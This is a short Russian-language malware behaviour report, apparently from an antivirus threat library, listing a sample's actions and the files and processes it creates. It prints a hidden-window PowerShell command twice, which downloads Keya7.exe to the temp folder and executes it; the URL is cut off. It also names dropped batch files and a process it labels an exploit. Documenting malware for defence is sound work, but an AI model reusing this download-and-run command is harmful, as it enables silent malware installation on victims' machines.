Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $cdcjwgij как %temp%\keya7.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Dvcfyyc([String] $Cdcjwgij){(New-Object System.Net.WebClient).DownloadFile($Cdcjwgij,''%TEMP%\Keya7.exe'');Start-Process ''%TEMP%\Keya7.exe'';}try{Dvcfyyc(...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1404
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\qlcda_aipw.bat
- %TEMP%\985801.cvr
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Dvcfyyc([String] $Cdcjwgij){(New-Object System.Net.WebClient).DownloadFile($Cdcjwgij,''%TEMP%\Keya7.exe'');Start-Process ''%TEMP%\Keya7.exe'';}try{Dvcfyyc(...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Qlcda_aipw.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Qlcda_aipw.bat" "
